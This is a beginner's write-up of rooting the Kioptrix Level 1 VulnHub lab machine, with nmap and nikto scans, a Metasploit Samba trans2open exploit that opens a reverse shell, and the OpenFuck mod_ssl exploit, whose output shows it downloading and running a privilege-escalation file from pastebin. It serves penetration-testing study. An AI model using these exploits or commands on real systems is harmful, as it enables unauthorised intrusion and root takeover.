In this post I'm going to go over my experience working the Kioptrix Level 1 beginners box from VulnHub. This is essentially a write up and a set of study notes in one piece.
This post is based off of my learning experience with Heath Adam's course, Practical Ethical Hacking. I followed all of Adam's steps and instructions so that I could learn his methodology and learn about tools I never even knew existed (because you know, I've been at this for five minutes.)
Installing the VM was a pain in the arse but luckily the TCMSec team had me covered by having a working copy of the system in question. I won't post a link here as I'm unsure if I'm allowed to.
Breaking it down
Here are the steps taken:
nmapscan of the host to discover possible entry points
- Hitting ports
443in the browser to see what comes back
niktoto scan the website for possible vulnerabilities
dirbusterto find sub-directories and possibly sensitive files like backups and credentials
- Do some manual searches to find exploits
- Execute Nesus to get some confirmation on found exploits
- Use Metasploit Framework to root (pop) the system
- Use OpenFuck (soiler alert!) to manually pop the system
The Scan -
Here is an initial scan of the system. I used this
nmap -T4 -p- -A $IP
This can be broken down as such:
-T4- this is the speed at which
nmapscans the target. This flag accepts a scale from
-p-- the ports to scan. In this case,
-pessentially means: everything
-A- this means scan
All. It instructs
nmapto scan everything it can possibly scan after finding an open port.
Adam points out that using
-sS isn't a thing anymore. It's and old-school method of scanning a remote host without being detected. The flag can be translated to
-scanStealth in "long form". It worked by initiating a
TCP SYN, waiting for a
TCP SYN/ACK, and then instead of sending a second
TCP ACK it instead sent a
TCP RST, resetting the connection.
So the results of the scan for me turned out like this:
So what did we find?
443suggesting a website or websites are present;
139suggesting a SMB share is being hosted here;
22- nothing surprising here except at this point it tells us we're dealing with Linux (guranteed with this box given it was built in 2011, if not earlier, and OpenSSH wasn't available natively in Windows Server at that point.)
- And port
32768which is something called IBM FileNet. I've never heard of this before today.
Let's move onto enumerating the system further, starting with ports
This great little tool was invoked as such:
nikto -h http://$IP/
And the results were fascinating:
$ nikto -h http://10.0.2.10 1 ⨯ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.0.2.10 + Target Hostname: 10.0.2.10 + Target Port: 80 + Start Time: 2021-04-20 19:58:26 (GMT10) --------------------------------------------------------------------------- + Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b + Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 13:12:46 2001 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version) + Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current. + OSVDB-27487: Apache is vulnerable to XSS via the Expect header + OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392. + OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839. + OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542. + mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756. + Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL. + OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). + OSVDB-3268: /manual/: Directory indexing found. + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-3092: /test.php: This might be interesting... + /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found. + /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found. + /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found. + /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found. + /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found. + /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found. + /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found. + /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution. + /shell?cat+/etc/hosts: A backdoor was identified. + 8707 requests: 0 error(s) and 30 item(s) reported on remote host + End Time: 2021-04-20 20:00:08 (GMT10) (102 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Do note that
nikto is considered "loud" and not always a good choice.
A nifty little tool,
DirBuster was able to find a tonne of stuff such as Webalizer metrics/logs/visualisations and a testing PHP page.
I decided not to explore too much of this stuff except for the items Heath goes over in his course in the interest of time.
Manual Exploit Discovery
Before going into automatic exploit discovery, like Nessus (below), Heath teaches and encourages the student to Google around for exploits. Here is what I found.
These are the primary entry points. There are possibly others, perhaps via Webalizer, but I haven't trained in web exploitation yet, so I'm keeping this simple.
In Heath's course we cover Nessus and run it against the Kioptrix 1 VM. Here is a screengrab of my results:
It's safe to say this box has a few issues. Here's a screenshot showing the critical issues discovered:
So Nessus found a lot wrong with the system. Far more than we did manually searching for things.
Metasploit Framework - Getting root
Once we know what kind of options we have available to us we can search for exploits in MSF.
With the Samba exploit I (and Nessus) found something called
trans2open. MSF has modules for this across multiple operating systems:
msf6 > search trans2open Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) 1 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) 2 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) 3 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
So we have:
We know from our scans that we're dealing with a RedHat Linux host:
http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
Which we got from our
nmap. Although not guaranteed to be accurate, given we found port
sshd and we detected Apache, it's very likely to be a Linux system.
To exploit the system we "load" the
msf6 > use exploit/linux/samba/trans2open [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
Notice the information re: "no payload configured". The default payload is a staged payload (it executed in stages, which is unstable and doesn't always work.) I tried the default and it failed.
Changing the payload is simple enough. Here's a list of available options (this is a screenshot due to the width/size of the output):
Because I tried the staged payload and it didn't work, I should now find and use a non-staged payload. The option we want is:
linux/x86/shell_reverse_tcp. Knowing why this option is non-staged is covered by Heath, but a Google search should yield results.
After finding the correct module to load, setting a working payload, we can set the remote host and execute
msf6 exploit(linux/samba/trans2open) > exploit [*] Started reverse TCP handler on 10.0.2.15:4444 [*] 10.0.2.10:139 - Trying return address 0xbffffdfc... [*] 10.0.2.10:139 - Trying return address 0xbffffcfc... [*] 10.0.2.10:139 - Trying return address 0xbffffbfc... [*] 10.0.2.10:139 - Trying return address 0xbffffafc... [*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.10:32769) at 2021-04-26 15:28:12 +1000 whoami root hostname kioptrix.level1
Manual Exploitation: OpenFuck
Although Metasploit Framework is used a lot in the real world, a lot of certifications, such as the OSCP, want you to manually exploit systems so that you can demonstrate an understanding of what the f- is going on.
With my basic Googling to uncover an exploit for Samba
2.2.1a I discovered OpenFuck.
It's a piece of C code that I am yet to fully understand, but I appreciate what it's doing. The steps to use this little gem are relatively simple:
- Compile the file using
gcc -o OpenFuck OpenFuck.c -lcrypt
- Execute, provinding the right flags:
./OpenFuck 0x6b 10.0.2.10 -c 40
0x6b selects the correct "playload", if you like, and the
-c 40 sets the number of connections. I won't pretend to understand what the latter means.
Here's the entire output:
┌──(kali㉿kali)-[~/git/kioptrix_1/OpenLuck] └─$ ./OpenFuck 0x6b 10.0.2.10 -c 40 ******************************************************************* * OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open * ******************************************************************* * by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE * * #hackarena irc.brasnet.org * * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname * * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam * * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ * ******************************************************************* Connection... 40 of 40 Establishing SSL connection cipher: 0x4043808c ciphers: 0x80f80a8 Ready to send shellcode Spawning shell... bash: no job control in this shell bash-2.05$ race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt --15:39:24-- https://pastebin.com/raw/C7v25Xr9 => `ptrace-kmod.c' Connecting to pastebin.com:443... connected! HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] 0K ... @ 3.84 MB/s 15:39:25 (3.84 MB/s) - `ptrace-kmod.c' saved  ptrace-kmod.c:183:1: warning: no newline at end of file /usr/bin/ld: cannot open output file p: Permission denied collect2: ld returned 1 exit status whoami root hostname kioptrix.level1